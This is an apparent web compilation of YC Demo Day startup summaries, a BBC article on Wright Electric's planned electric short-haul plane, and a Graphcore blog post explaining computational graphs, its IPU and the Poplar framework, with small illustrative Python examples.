Terark – Making databases faster

“We are the Pied Piper of databases, but we’re the real one” says Terark’s co-founder, alluding to HBO’s Silicon Valley show. Terark uses a special technology to dig data out of databases in a way that makes memory and hard disks more efficient. It claims to be faster than Google’s LevelDB and Facebook’s RocksDB database technologies, and has received a $1 million contract from Alibaba. With 10 years of experience in databases, Terark wants to steal a chunk of the $35 billion database market as all the information on Earth becomes digitized.

 

Wright Electric – Boeing for electric airplanes

Wright Electric wants to build the world’s first electric airplane. One of the main reasons airlines like Southwest can offer low fares is that they pre-purchase gas, but Wright sees an opportunity to make flights even cheaper by using electric planes instead. The company is targeting the 30 percent of all flights that are 300 miles or less, and partnering with EasyJet to start. As technology improves, it believes its planes will be able to go after the $26 billion short-haul flight market.

Read more about Wright Electric on TechCrunch

 

Speak – AI English tutor

People spend $90 billion a year on human English teachers who are expensive and ineffective. Speak offers a mobile app where you can have English conversations with your phone about real-world scenarios like interviewing for a job or asking for directions. It uses speech recognition to identify English words through thick accents and teach people to speak more clearly. Meanwhile, it’s building a massive database of accented-English speech, which can be used to improve its system and other speech recognition systems. Speak’s team formerly built accent detection systems and sold Flashcards+ to Chegg. Though AI translation might reduce the need for people to know other languages, speaking English remains a valuable skill people are willing to pay for.

 

NanoNets – A machine learning API

Machine learning will change the way business is done, but like databases, most companies don’t build their own from scratch. NanoNets’ API makes it easy for any business to employ machine learning. They just upload their data, wait 10 minutes for it to be analyzed, and add a few lines of code. They can then start seeing results of automatic data mining via ML, such as being able to identify the brand of a shoe in photos. NanoNets is able to recycle learnings from previous jobs to reduce the amount of data it needs for future tasks. It’s already seeing 1 million API calls a week, and sells a $99/month subscription with up to 10,000 API calls. By working with multiple clients, it can improve its systems much faster than any single client building ML technology by themselves.

 

Scribe – Automating sales development representatives

It’s tough for businesses to tell the difference between a high-potential sales lead and someone wasting their time. Scribe builds a smart inbound sales form for a company’s website that uses the data it receives and external data sources to instantly determine whether it’s a “hot lead” that should immediately be routed to the right sales rep, or a “cold lead” that should be put on the back burner. Scribe says it’s 50% cheaper and generates 20% more leads than hiring a sales development rep. It already has $10,000 in monthly recurring revenue just 3 weeks after launch, and after the $4 billion inbound sales market, it wants to attack the massive outbound sales opportunity.

 

Breaker – Making podcasts a real business

Most podcasts are free, but serious publishers are spending big budgets to make high quality audio content like Serial, which hit 100 million downloads and made podcasts mainstream. 67 million Americans are already listening to podcasts a month. Breaker wants to sign exclusive deals to distribute the best premium podcasts and charge users $6 per month. First, its goal is to build a huge listener audience by making the best podcast consumption app. It launched today, and will offer podcasters ways to connect and get feedback from their community, and analytics about what content performs best. It has a stunning 67% retention rate after a month for beta users. If it can convince people to pay for what’s often free, it could become the preferred place for podcasters to talk.

Bitrise – Automated build/test/deploy for mobile apps

Bitrise claims it can save developers one hour per day by automating unit tests, distributing tests to testers, and uploading apps to app stores every time the app’s code changes. Thanks to its open source integrations, you can connect any app like Slack for notifications and Hockey for beta tests. Bitrise already counts Microsoft and Xamarin as paying customers, and has $660,000 annual recurring revenue that’s growing 20% per month. And if things go right, it could become a hub where developers discover services that make their job easier.

 

Fibo – Mobile work tracking for construction teams

Fibo’s mobile app lets construction field teams keep work logs and time sheets, take photos of progress, and submit them to the boss’s office. It says it can save employees 4 hours of field paperwork per week, which could save their employers $4,000 a year. Customer retention is strong at a $30 per month per worker price point. With 10 million field workers in the US, there’s a $4 billion opportunity there. But using its construction-worker engagement and data, it could next upsell services around workers’ comp and more. Construction was slow to adopt tech, but now that every worker has a smartphone, there are new opportunities for startups like Fibo.

 

 

Paragon One – Career coaching from real professionals

Families spend a fortune on sending their kids to college, and many students end up going into debt, but they still aren’t prepared for the job market. College career centers are often unhelpful. Paragon One thinks the answer is skill and interview-prep coaching from professionals who already landed jobs at top companies like Apple and Google. Families pay $7,500 up front, and the kids get coaching over video chat. Paragon One says 100% of students who completed the program got job or internship offers. It’s now doing $55,000 in monthly revenue with a 56% unit profit margin after customer acquisition costs, and it’s growing 40% monthly. While the price might seem steep, there are 2 million students each year not on financial aid, and their families end up paying around $200,000 for a college education that doesn’t guarantee a job. A little extra career guidance and interview prep from Paragon One could leverage that sunk cost and get kids lucrative jobs.

Tress – A social community for black women’s hairstyles

Tress says black women spend 9X more on their hair than any other demographic, with the worldwide black hair care market estimated at $500 billion a year. The process of changing hairstyles includes inspiration on social networks, YouTube tutorials, booking stylists, and buying hair care products. Tress wants to bring these all into one product. It says it now has 30,000 weekly active users and is growing 20% week over week. With users frequently sharing the hairstyles they discover on Tress, it has a built-in growth mechanic.

Bicycle AI – Automated AI customer support

Bicycle is a full-stack customer support service that uses AI to answer customer questions 24/7. The startup says it can eliminate 60-80% of level 1 support cases for $3 per case, earning it an 80% margin. It has already handled 75,000 conversations with 5 beta customers at a 30-second response time, and it’s growing 20% per week. Since it’s a full-stack service, not just a tool, it can charge much more, and AI makes sure wrong answers don’t reach customers. Support is a massive market where AI could replace costly call center workers.

Vize Software – Self-Serve Palantir

Visualizing data is harder than it should be. Vize makes software that creates beautiful and interactive data visualizations that can be edited on the fly. Businesses can change values of their data right in the charts. That’s extremely useful for businesses researching what-if scenarios. It’s racked up $450,000 in annual recurring revenue in 3 months, and has clients like KPMG and the French Ministry Of Defense. Every business is becoming data driven, and Vize lets them see what they’re doing.

Simple Habit – Netflix for meditation

Americans spent $1 billion on meditation in 2015, and $2 billion in 2016. This is the beginning of a mindfulness movement that Simple Habit wants to monetize. Simple Habit’s founder Yunha Kim was burned out after selling her last startup Locket. She found that most meditation apps only offer a few meditation programs or teachers. So she left Stanford’s business school to build Simple Habit, which has 60 teachers with 1000 topics. That way, you can get purpose-made content to help you get to sleep, relieve stress, or prepare to speak in public. It’s grown to $600,000 in annual recurring revenue since launching six months ago. Yoga went from a niche activity to a huge business in a few years, and now meditation is starting that same hockey-stick moment.

Snappr – On-demand pro photographers

Photography services are a $30 billion market, but the experience involves annoying comparison shopping, frustrating scheduling and delays, and high prices. Snappr instead lets you book a pre-vetted photographer through its app in just a minute and be shooting photos soon after at $59 an hour. Snappr can charge so little because most photographers waste a ton of time trying to book gigs rather than working them, but Snappr routes jobs to them automatically. It’s growing 75% per month and has a $1 million run rate thanks to customers like Uber and Groupon, who use it to shoot product photography. Snappr wants to be the Uber of photography, taking a hyper-fragmented market of individual workers and giving them a logistics tool to maximize the hours they spend getting paid.

IQBoxy – Software that replaces human bookkeepers

Bookkeeping is a $57 billion industry, but it’s riddled with human errors and inefficiencies. IQBoxy makes a mobile app that uses machine learning to scan physical or digital receipts and invoices, parse the data, and reconcile the finances with your bank. It handles end-to-end bookkeeping with no humans involved, instead of just handling small parts of the expense chain. IQBoxy is growing 30% monthly and has processed 1.2 million receipts and invoices. Now it has a product called IQBoxy For Accountants, which lets accountants avoid busywork by freely registering their clients for IQBoxy’s paid service. The tech has finally arrived to leave the chore of bookkeeping to the machines.

 

Beek – Book review site for Latin America

Beek claims to be the biggest book review site in Latin America, with more than 150,000 weekly active users submitting an average of five reviews a week. User reviews are no longer than a tweet and use emoji, and readers can leave reviews as they’re reading, so many review books multiple times. Today the company is focused on book reviews, but it plans to expand into other types of media and experiences, to become the review site for everything in Latin America.

 

 

Bulk MRO – Industrial supplies for India

Bulk MRO wants to become the Alibaba for enterprises in India, providing a one-stop shop for all the industrial tools they might need. The company is already at a $4.3 million GMV annual run rate and has $1.1 million in orders for the next quarter, and it’s profitable. 22 of Bulk MRO’s customers are Fortune 500 companies and more than 89 percent of its orders are repeat business. The company is going after the $20 billion market of industrial products sold every year, which is expected to double by 2022.

 

Soomgo – Thumbtack for South Korea

Soomgo has created a marketplace that helps local service providers in South Korea find new customers. Unlike the U.S., which has Yelp, Angie’s List, and other marketplaces for local services, South Korea lacks such platforms, even though it is home to more than 1.5 million businesses spending an average of $500 a month on advertising. With Soomgo, they buy credits upfront to be connected with potential customers and try to win their business. Soomgo already has more than 30,000 service providers signed up and is making over $50,000 a month in net revenues.

 

Cartcam – Shopping app for the Snapchat generation

Cartcam is a shopping platform that gives people discounts for creating short video reviews. The company hopes to capitalize on the finding that consumers are 85% more likely to purchase an item after watching a video. Cartcam incentivizes mobile creators to review items by offering them discounts on the items they want to buy. Already 12 percent of users place an order through the platform, and they are all creating content for Cartcam. The company makes money by partnering with brands, who pay for the discounts in exchange for content that will sell more goods for them.

 

Peer5 – P2P Serverless CDN

Peer5 is a peer-to-peer CDN for live video streaming, which has already attracted clients like Sony and Dailymotion. The company is trying to solve the problem of how to stream to more than 1 million concurrent users. Unlike traditional streaming solutions, peer-to-peer video streaming gets better as more people connect. The company also does all this through JavaScript, without relying on any plugins or downloads. After five years of iteration over 1.4 billion video sessions, Peer5 now has 25 paying customers signed up. Because it isn’t buying servers, Peer5 can charge half the price and still make 98 percent margins on streaming.

 

Pit.ai – Automatically mining trading strategies

Pit.ai is an AI-powered hedge fund that charges no management fees. The company has built AI to create new trading strategies that allows it to cut out the money other hedge funds pay their traders. Instead of taking management fees, Pit.ai only takes a cut of profits it generates on behalf of clients. That means it only makes money when its clients make money.

 

SmartAlto – Software suite for commercial real estate

SmartAlto helps commercial real estate owners win and close deals faster. Rather than keep all of their files and communications in email and spreadsheets, SmartAlto gives those customers a single hub for all their people, communications and deals. The platform helps them organize prospects, conduct due diligence and keep track of every process all the way to closing. There are more than 2 million commercial real estate professionals in the U.S. operating in a $3.6 billion industry, and SmartAlto wants to expand to banks and government agencies after that.

 

XIX.ai – Predictive assistant that anticipates your needs

Founded by AI researchers from OpenAI, Google Research and UC Berkeley, XIX was built to actively predict what users want to do at any time. Based on user behavior, the service has a 90 percent prediction rate — which means 9 out of 10 times it knows what a user wants to do before they do. Once it gets to 99 percent, XIX believes that users will never have to click through various apps to complete various tasks, as long as they have an Android mobile phone.

 

Zestful – Employee activities as a subscription service

Zestful provides a subscription service through which companies pay $100 per employee each month. Employees then go onto the platform and vote on a number of activities that they want to do, and Zestful’s software books those activities for them. Team activities are the best way to increase productivity, and companies spent $3 billion on team activities last year. However, many companies, even if they have the budget, don’t do activities because no one wants to plan them. Zestful solves that problem for them. Although it just launched in San Francisco, Zestful already has 16 companies on board.

 

Arthena – Art investing for everyone

Arthena has built a platform to make smart decisions around investing in art — it knows what to buy, when to sell, and how to make money. There was $70 billion in art traded last year, but it’s a market that’s highly inefficient. Arthena uses its knowledge of the art market to allow investors to make art just another part of a diversified investment portfolio, and has raised $20 million in funds over the last 10 weeks to invest.

 

Mednet – Stack Overflow for oncologists

The Mednet is a network of oncologists who are trying to treat cancer. It allows them to share knowledge with each other, helping the 80 percent of oncologists who are generalists to improve treatment. The company makes money by helping to speed up clinical trials, connecting  pharma companies with the oncologists who are treating particular problems. Today, 70 percent of clinical trials are delayed due to enrollment problems, and the Mednet thinks it can change that.

 

Penny – A mobile personal finance coach

Penny provides an app that helps normal people understand their finances and improve them. On the back end, Penny tracks your income and spending; on the front end, it uses a chat interface to provide personal coaching to its users. It can acquire new users for $2 apiece, and has rolled out a premium membership that hundreds of users are already paying for. Users on average have cut spending by 16 percent in targeted categories, and 15 percent of users click through to affiliates it suggests to help them lower their debt.

 

Moneytis – The cheapest way to send money abroad

Moneytis wants to provide a cheaper way for customers to send money between two countries. Users simply say how much they want to send and where they want to send it, and Moneytis finds the best way to send that money. Over the past 10 weeks alone, Moneytis has transferred $3 million for its users. Every year, 250 million people send $600 billion internationally, and businesses send $25 trillion. That’s a huge market Moneytis wants to own.

 

Hogaru – Cleaning for SMBs in Latin America

Hogaru provides professional cleaning services to small and medium sized businesses in Latin America. The cost of acquiring a cleaner in Latin America is much lower than in the U.S., and Hogaru keeps those cleaners by hiring them as actual employees. As a result, it can attract and employ cleaners at a fraction of the cost of what it would take in the U.S. Since they are treated as employees, those cleaners are much less likely to churn and the company can control their schedules. The lifetime value of customers is 14 times the cost of acquisition, and the company makes more than $240,000 revenue each month.

 

Bulletin – WeWork for retail space

Bulletin finds premium retail locations, sets them up to look like Apple Stores, and then allows brands to pre-pay for space. Brands are already spending $2,000 upfront per month for just 8 square feet of space on Bulletin. The company can onboard brands in just five days and make their products available for sale. There are 10 million brands on Etsy, Shopify, Squarespace and Amazon, and pop-up stores are a $20 billion industry. By lowering the price, making it turnkey and making premium real estate accessible, Bulletin hopes to change how the industry is run.

 

Sycamore – Onboarding drivers for on-demand jobs

Sycamore allows any company to add a driver in less than 5 minutes. That’s important because drivers are making so little that some are sleeping in their own cars. Sycamore removes unnecessary steps and pools good drivers, lowering companies’ acquisition costs by 70%. The company launched 3 weeks ago and has completed 640 jobs, with 2x weekly growth and a 14% commission for drivers. Any company can also deploy surge pricing, creating a better backbone for driver delivery.

Aella Credit – Consumer and low-income lending platform

Aella endeavors to give low-income people in Africa access to credit. More than 90% of the continent can’t access credit, and 425 million people can’t get mid-sized loans. The reasons are various but have much to do with the difficulty of approving credit. However, McKinsey says this is a potential $10 billion industry in Africa. Aella built a way to get a mid-size loan ($500 and above) by enabling access to credit through data partnerships like HR data and biometrics. So far Aella has given $1.47 away and says it has a good repayment rate. How’s it working out so far? There are currently 300 companies on the waiting list for Aella with $36 million in combined income.

 

Tolemi – Software to help cities find distressed properties

A self-described Palantir for city government, Tolemi is building a data hub to connect all of a city’s property data, starting with vacant properties. Tolemi works by hooking into government data within cities and connecting that data to show city government where potential problems are. In the 11 months since launch, Tolemi already has $1.3 million under contract and an $800 ARR. It is currently being used in 54 cities, and with a team of just four people, Tolemi says it is already profitable. Something that used to require hiring contractors, take a lot of time and cost thousands of dollars can now be done in an instant, and it helps with urban planning, identifying fire hazards, vacancies and other things a city might want to know.

 

Niles – Conversational wiki for business

Niles is a wiki you can talk to in Slack. The bot answers internal team questions so employees don’t have to dig through Google Docs or SharePoint to find them. If you want to know what the discount for an enterprise customer is, you just ask Niles, for instance. Niles will find answers in your spreadsheets and other materials to save you time and the frustration of searching. The team comes from Google, Palantir, and Apartment List. It said it launched on TechCrunch last week and blew up (this is the first this writer has heard of the product). It’s a $27 billion market, and Niles claims 700 teams signed up in one week.

 

Upcall – Outbound calls as a service

Calling someone is 16x more effective than email, but calling a long list of people yourself takes a long time. Upcall makes it easy by connecting you to a network of call agents working from home. You can listen in on the calls and get feedback in real time. Right now Upcall has a 100-agent network and has logged over 85,000 minutes of calls. It also claims over 350 customers, like LG, Coldwell Banker and others, who use it to call people for things like debt collection, surveys and more. This is a $23 billion industry in the U.S., and the company plans to expand to several countries in different languages. It has tripled revenue since starting YC and says it is building the “call revolution.”

 

KidPass – One pass for “amazing activities for kids”

KidPass is a ClassPass for kids’ activities, a $30 billion but highly decentralized industry. KidPass solves this by building one place to discover and book activities for kids. It launched in NYC this year, now has thousands of activities on the site, and claims more than 3,000 families using the service with a $180,000 ARR. Next month it says it will be profitable, and it also plans to expand the service to include new KidPass-exclusive passes. It also works with new providers and inventory to expand the experience. It is currently the largest NYC kids’ activity marketplace.

 

Lively – Modern healthcare savings account (HSA)

HSAs are triple-tax-advantaged savings accounts and, the founder says, the “future” of savings, on track to become a $435 billion market. Lively is a modern HSA that makes it easy to access what you have in the bank. It has already worked out permissions with the bank so you can use the money for what you need. Lively is also creating a healthcare marketplace and is a payments and banking platform.

 

Indigo Fair – Amazon for local retailers

Indigo Fair is a free, AI-powered platform where retailers can find new products for their store. It allows retailers to A/B test merchandise, and they can return what doesn’t sell for free. The team built Square Cash, and one of them headed Square Capital. Local retail in the U.S. is a massive market, and “shop local” is a slogan that isn’t going away. Most small business owners go to trade shows or buy through independent sales reps; no one had figured out how to get them shopping online until now. The company has signed 30 retailers in the eight weeks since launch, says it is seeing a high rate of return business, potentially worth $450,000 in LTV, and has on-boarded 6,000 makers.

 

Collectly – Stripe for medical debt collection

Collectly helps doctors collect 2x more debt than they could before. It’s a business in which $280 billion is sent to debt collection, but collectors recover only about 20% on average. The founder is a former CEO of a debt collection agency who collected over $100 million. His new startup works by making it easy for debtors to pay what they owe, by paying online and setting up payment plans. Collectly launched 3 weeks ago and is growing 20% week-over-week. It has already signed up 14 doctors who pay a 15% fee. So far the startup has been able to collect $65,000 and says that is a 56% success rate versus the debt agencies.

 

Tetra – Automatic notes for business meetings

A lot of meeting notes are taken in Evernote, but Tetra takes call notes for you by automatically dialing in to join the call and then sending you a fully searchable record of the entire conversation. It comes in two flavors: automatic speech recognition only, or human-edited transcription for 50 cents a minute. There may be some ethical challenges around recording others, and each person using the service will need to inform those on the call that they are being recorded, but with two billion hours of conference calls a year, Tetra plans to take on that market using its AI and data. The startup launched on Product Hunt a week ago and now has two paid monthly users.

 

FloydHub – Heroku for deep learning

Deep learning is a huge deal in the tech industry, but it’s really hard to get it to work. The founder has been doing deep learning since its early days in 2009 and has a plan to make working with it less of a pain by helping you train and deploy deep learning models. So far the traction seems promising, with more than 2,500 users and 6,000 on the waiting list since launching 4 weeks ago. Udacity loves Floyd so much, according to the founder, that it is switching from AWS to Floyd. The startup is also building a marketplace with 3,000 datasets and 1.5 terabytes of data.

ReturnBase — Solves returns for retailers

According to the National Retail Federation, Americans returned $260 billion in merchandise to retailers in 2015, or 8 percent of all purchases. Over the holidays, that figure reportedly jumps to 10 percent. Gartner Research has said that because less than 50 percent of those products are re-sold at full price, these returns can cost retailers 10 percent of their sales. In fact, some of it ends up in landfills, if not at discount warehouses.

ReturnBase, a year-old, California-based startup, is setting out to tackle this “operational nightmare” for retailers through a platform that it says makes selling and pricing returns more efficient, from assessing demand to photographing goods to inspections. In fact, the company says that despite its 35 percent commission on every transaction, it can produce for retailers three times what they’re currently squeezing out of returns. At scale, argues the company, that’s a $100 billion opportunity.

 

Ledger Investing — Helps insurance companies reduce risk

The concept of “insurance securitization” dates back more than 40 years, but it was other securitized products — think mortgage-backed securities — that ultimately captured the imagination of Wall Street. There’s a good reason for that, argues Ledger Investing, a year-old, Mountain View, California, startup that points the blame at the various and complex types of insurance that get bought and sold every day. (Think more and less risky underwriting risk.) What’s changed? According to Ledger, at least, it has finally figured out how to create a business-to-business online marketplace where insurers and investors can confidently sell and buy different types of securities linked to various classes of insurance — and at scale. Certainly, the company’s CEO might instill confidence in those intrigued by this kind of financial product: Samir Shah, who joined the company last September, was formerly the head of Insurance Capital Markets at AIG.

 

Armory —  Deployment and rollback software

Armory is a company that’s commercializing Spinnaker, an open source, multi-cloud continuous delivery platform for quickly (and, hopefully, confidently) releasing software changes. The company’s apparent thinking: all the cool kids are using Spinnaker, including Netflix, which uses it to build and deploy continuously to its worldwide operations in more than 50 countries. Netflix even open sourced it toward that end. But Spinnaker remains “an insanely complicated piece of software,” according to Armory, so it has built proprietary software atop the platform that it hopes to sell to every Global 2000 company that’s moving to the cloud in the next decade. (Put another way, it intends to sell to all of them.) Some of the features it’s already offering its budding base of enterprise customers? Safety, security, and compliance.

 

RankScience — Software-automated SEO.

The straightforward tagline of RankScience is “software-automated SEO,” and according to its CEO, Ryan Bednar, the company’s technology is nearly as simple for customers to use. “Just plug in RankScience, and search traffic goes up,” he told the crowd at today’s YC Demo Day. It’s a big opportunity: Google makes $50 billion off of search every year. Unfortunately, Bednar was a little light on how RankScience works (aside from selling subscription software that automates testing and continuously optimizes web pages). But he insisted that over the three-month period that RankScience was a participant in YC’s program, early clients saw their average search traffic jump by 68 percent. Without sharing how much the company charges for its results, he added that RankScience is currently seeing $80,000 in monthly recurring revenue.

Read more about RankScience in TechCrunch.

 

MDAcne — Dermatology telemedicine app

MDAcne is a mobile app that does just what you’d guess it does — it tries to treat people with acne remotely. Why bother? According to the company, 500 million people suffer from acne, yet 90 percent never see a dermatologist because it’s too expensive. MDAcne’s solution is to replace those visits with an easy, accessible, and more affordable app that’s driven by computer vision. Just take a selfie, and MDAcne will analyze your skin, then spit out a routine that fits your specific condition, along with suggestions about which products to use. (Hello, affiliate money.) The company launched two months ago and says it has already registered 50,000 people. It didn’t say what percentage of them are paying the company the $13 per month that it’s currently charging for its services.

 

Sandbox — App store for banks

Sandbox is a company whose software integration platform aims to connect the legacy systems of banks and credit unions and provide them with one standardized API that their fintech vendors can use to integrate with them seamlessly. Put another way, it’s building an app store for banks. So far, it says 17 fintech vendors have agreed to use the platform; the unsurprising idea is to hit critical mass, after which “every new financial institution will consume the newest technologies via Sandbox.” Like all app stores, notes the company, it’s a “winner take all market.” (As for how it makes money, it has apparently stolen its inspiration from Apple here, too, with plans to take a 30 percent revenue cut from every sale.)

lvl5 — Maps for autonomous vehicles

You might have read recently that one of the biggest obstacles to building self-driving technologies is a shortage of special laser sensors like LiDAR that help cars figure out what’s around them. These sensors — which emit short pulses of laser light so that software in a vehicle can create a 3D image of its surroundings — can also be atrociously expensive, ranging from $8,000 to $80,000. Now, lvl5 thinks it has a better, cheaper, and more plentiful solution: computer vision software that extracts visual landmarks like stop signs and lane lines, then aggregates the data into a kind of 3D map of the world that enables cars to triangulate their locations down to within an inch. Basically, the company says it can achieve the same level of accuracy as LiDAR. Better still, it alleges, its system combines its software with cheap cameras, opening up the possibility of mass-producing self-driving cars. Even more interesting here: lvl5 thinks that software will become a commodity, so it isn’t even charging for it right now. It sees the big money instead in its mapping data (and that ain’t free).

ACLU – A non-profit you might know 

The American Civil Liberties Union was a surprise addition to this YC batch, but it is at the forefront of the fight against the Trump administration and the defense of American values. ACLU executive director Anthony Romero got loud applause as he took the stage to talk about how for 97 years the ACLU has been defending the rights of individuals, including in hard-fought cases such as Scopes (the right to teach evolution), Miranda rights, the right to contraception, Loving (the right of interracial couples to marry) and many others. The ACLU has 300 litigators and 1,300 staff working to move forward on a broad range of issues. But it is still a David to Goliath, as the Trump administration dwarfs it with more than 19,000 lawyers. It needs our help to continue fighting for the rights of immigrants, women, same-sex couples and other disadvantaged groups. The average gift is $70, and the ACLU needs our help to cut across party lines to uphold American values, defend core civil rights and stand up for the American people.

 

Close this section

London-Paris electric flight 'in decade'

Wright One plane. Image copyright: Wright Electric
Image caption A mock-up of the Wright One, Wright Electric’s plan for short-haul, electric-powered flight

A new start-up says that it intends to offer an electric-powered commercial flight from London to Paris in 10 years.

Its plane, yet to go into development, would carry 150 people on journeys of less than 300 miles.

Wright Electric said by removing the need for jet fuel, the price of travel could drop dramatically.

British low-cost airline Easyjet has expressed its interest in the technology.

"Easyjet has had discussions with Wright Electric and is actively providing an airline operator's perspective on the development of this exciting technology," the airline told the BBC.

However, significant hurdles need to be overcome if Wright Electric is to make the Wright One, pictured above, a reality.

The company is relying heavily on innovation in battery technology continuing to improve at its current rate. If not, the firm will not be able to build in enough power to give the plane the range it needs.

Industry experts are wary of the company's claims. Graham Warwick, technology editor of Aviation Weekly, said such technology was a "long way away".

"The battery technology is not there yet," he told the BBC.

"It's projected to come but it needs a significant improvement. Nobody thinks that is going to happen anytime soon. And there's all the [safety] certification - those rules are yet to be created, and that takes time."

The company is yet to produce a plane of its own and is instead working alongside American inventor Chip Yates, whose own electric aircraft, the Long-ESA, holds the world record for fastest electric aircraft.

Wright Electric's competitors include aviation giant Airbus, which has been developing its electric two-seater plane E-Fan since 2014, and has stated plans to create its own short-haul electric aeroplane seating 70 to 90 passengers.

Wright Electric is backed by Y Combinator, Silicon Valley's most highly regarded start-up incubator programme. Alumni of the scheme include companies such as Airbnb, file storage company Dropbox and HR management software firm Zenefits.

Wright Electric's goal, detailed in a presentation given to potential investors on Tuesday, is to make all short-haul flights electric-powered within the next 20 years, which would be about 30% of all flights made globally.

The company said that as well as lower fuel costs for the airlines, the technology could have a major added benefit for the public.

"Depending on how it's designed, you can have an electric plane that's substantially less loud than a fuel plane," said Jeff Engler, Wright Electric's co-founder.

Batteries would be charged separately, he said, meaning planes would not have to sit on the tarmac while power is replenished.

"The way we've designed our plane is to have modular battery packs for quick swap using the same cargo container that's in a regular airplane," Mr Engler said.

"We want it to be as fast as possible, so airlines can keep their planes in the air as long as possible and cover their costs."

Other technology start-ups are seeking to innovate within the aviation industry.

Boom, a company backed by Sir Richard Branson, is developing a Concorde-like supersonic jet. It hopes to achieve London to New York in three-and-a-half hours, a journey which currently takes more than eight hours. It is expected to run test flights later this year.

Follow Dave Lee on Twitter @DaveLeeBBC. You can reach Dave securely through encrypted messaging app Signal on: +1 (628) 400-7370

Close this section

Inside an AI 'brain' – What does machine learning look like?

One aspect all recent machine learning frameworks have in common - TensorFlow, MXNet, Caffe, Theano, Torch and others - is that they use the concept of a computational graph as a powerful abstraction. A graph is simply the best way to describe the models you create in a machine learning system. These computational graphs are made up of vertices (think neurons) for the compute elements, connected by edges (think synapses), which describe the communication paths between vertices.
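
To make that abstraction concrete, here is a minimal, framework-agnostic sketch in Python of such a graph: vertices hold a compute operation, and edges record which vertices feed which. The Vertex and Graph classes and the tiny relu(x * w + b) example are purely illustrative names invented for this post, not the internals of TensorFlow, Poplar or any other real framework.

class Vertex:
    def __init__(self, name, op, inputs=()):
        self.name = name            # label for the compute element ("neuron")
        self.op = op                # callable that performs the computation
        self.inputs = list(inputs)  # incoming edges ("synapses") from other vertices

class Graph:
    def __init__(self):
        self.vertices = []

    def add(self, name, op=None, inputs=()):
        v = Vertex(name, op, inputs)
        self.vertices.append(v)
        return v

    def evaluate(self, feeds):
        # Resolve each vertex after its producers, memoising results
        # (equivalent to walking the graph in topological order).
        results = {}
        def value(v):
            if v.name in feeds:                 # graph input supplied by the caller
                return feeds[v.name]
            if v.name not in results:
                results[v.name] = v.op(*(value(i) for i in v.inputs))
            return results[v.name]
        return {v.name: value(v) for v in self.vertices}

# Build y = relu(x * w + b) as a six-vertex graph.
g = Graph()
x, w, b = g.add("x"), g.add("w"), g.add("b")
mul = g.add("mul", lambda a, c: a * c, [x, w])
add = g.add("add", lambda a, c: a + c, [mul, b])
y = g.add("relu", lambda a: max(a, 0.0), [add])

print(g.evaluate({"x": 2.0, "w": -3.0, "b": 7.0})["relu"])   # prints 1.0

A real framework's graph carries tensors rather than scalars, but the shape of the problem (schedule vertices, move data along edges) is exactly what a graph processor is built to exploit.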

Unlike a scalar CPU or a vector GPU, the Graphcore Intelligent Processing Unit (IPU) is a graph processor. A computer that is designed to manipulate graphs is the ideal target for the computational graph models that are created by machine learning frameworks.

We’ve found one of the easiest ways to describe this is to visualize it. Our software team has developed an amazing set of images of the computational graphs mapped to our IPU. These images are striking because they look so much like a human brain scan once the complexity of the connections is revealed – and they are incredibly beautiful too.

A machine learning model used in astrophysics (LIGO) data analysis, visualized as a computational graph mapped to the IPU.

Before explaining what we are looking at in these images, it’s useful to understand more about our software framework, Poplar™ which visualizes graph computing in this way.

Poplar is a graph programming framework targeting IPU systems, designed to meet the growing needs of both advanced research teams and commercial deployment in the enterprise. It’s not a new language; it’s a C++ framework which abstracts the graph-based machine learning development process from the underlying graph-processing IPU hardware.

We’re also building a comprehensive, open source set of Poplar graph libraries for machine learning. In essence, this means existing user applications written in standard machine learning frameworks, like TensorFlow and MXNet, will work out of the box on an IPU. It will also be a natural basis for future machine intelligence programming paradigms which extend beyond tensor-centric deep learning. Poplar has a full set of debugging and analysis tools to help tune performance and a C++ and Python interface for application development if you need to dig a bit deeper.

We have designed it to be extensible; the IPU will accelerate today’s deep learning applications, but the combination of Poplar and IPU provides access to the full richness of the computational graph abstraction for future innovation.

Poplar includes a graph compiler which has been built from the ground up for translating the standard operations used by machine learning frameworks into highly optimized application code for the IPU. The graph compiler builds up an intermediate representation of the computational graph to be scheduled and deployed across one or many IPU devices. The compiler can display this computational graph, so an application written at the level of a machine learning framework reveals an image of the computational graph which runs on the IPU.
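
As a rough illustration of the scheduling half of that job (a sketch only, under my own simplifying assumptions, not Poplar's actual compiler), one simple strategy is to group vertices into levels so that everything in a level depends only on earlier levels: each level can then execute in parallel, and edges that cross levels become the communication the compiler must plan. The adjacency list below reuses the toy relu example from earlier and is, again, purely hypothetical.

from collections import defaultdict

# Toy graph as adjacency lists: vertex -> vertices it feeds into.
edges = {
    "x": ["mul"], "w": ["mul"], "b": ["add"],
    "mul": ["add"], "add": ["relu"], "relu": [],
}

def schedule(edges):
    # A vertex's level is one more than the deepest of its producers,
    # so all vertices within a level are mutually independent.
    indegree = defaultdict(int)
    for src, dsts in edges.items():
        indegree[src] += 0
        for d in dsts:
            indegree[d] += 1
    levels, frontier = [], [v for v, deg in indegree.items() if deg == 0]
    while frontier:
        levels.append(frontier)
        nxt = []
        for v in frontier:
            for d in edges[v]:
                indegree[d] -= 1
                if indegree[d] == 0:
                    nxt.append(d)
        frontier = nxt
    return levels

for i, step in enumerate(schedule(edges)):
    print(f"step {i}: run {step} in parallel")
# step 0: run ['x', 'w', 'b'] in parallel
# step 1: run ['mul'] in parallel
# step 2: run ['add'] in parallel
# step 3: run ['relu'] in parallel

A production compiler does far more than this (placement across devices, memory budgeting, communication costs), but the level-by-level structure is the intuition behind the layered clustering visible in the images below.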

The image below shows the graph for the full forward and backward training loop of AlexNet, generated from a TensorFlow description.

AlexNet: deep neural network

The AlexNet architecture is a powerful deep neural network (DNN) which uses convolutional and fully-connected layers as its building blocks. It rose to fame in 2012 when it won first place for image classification in the ImageNet Large Scale Visual Recognition Challenge (ILSVRC). It was a breakthrough architecture, achieving a large accuracy margin over non-DNN models.

Our Poplar graph compiler has converted a description of the network into a computational graph of 18.7 million vertices and 115.8 million edges. This graph represents AlexNet as a highly-parallel execution plan for the IPU. The vertices of the graph represent computation processes and the edges represent communication between processes. The layers in the graph are labelled with the corresponding layers from the high level description of the network. The clearly visible clustering is the result of intensive communication between processes in each layer of the network, with lighter communication between layers.

The graph itself is heavily dominated by the fully connected layers towards the end of the network structure, which can be seen in the centre and to the right of the image, marked as Fully Connected 6, Fully Connected 7 and Fully Connected 8. These fully connected layers distinguish AlexNet from more recent architectures such as ResNet from Microsoft Research, an example of which is shown below.

ResNet-50: deep neural network

